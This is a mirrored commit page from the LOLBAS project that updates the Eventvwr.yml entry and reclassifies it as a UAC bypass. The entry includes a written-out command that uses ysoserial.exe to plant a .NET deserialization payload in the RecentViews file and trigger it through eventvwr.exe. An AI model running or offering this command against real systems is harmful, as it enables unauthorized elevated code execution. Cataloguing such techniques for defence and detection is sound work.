public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 12:42:19 +02:00
Code Issues Projects Releases Wiki Activity

Add vsls-agent lolbin and committing a few other changes (#263)

Browse Source 
Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
bohops
2023-02-25 13:47:44 -05:00
committed by GitHub
parent ded90467a8
commit cd16f0aff3
6 changed files with 35 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
yml/OSBinaries/Eventvwr.yml
View File

@@ -14,9 +14,9 @@ Commands:
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
Category: Execute
Category: UAC Bypass
Privileges: Administrator
MitreID: T1202
MitreID: T1548.002
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\eventvwr.exe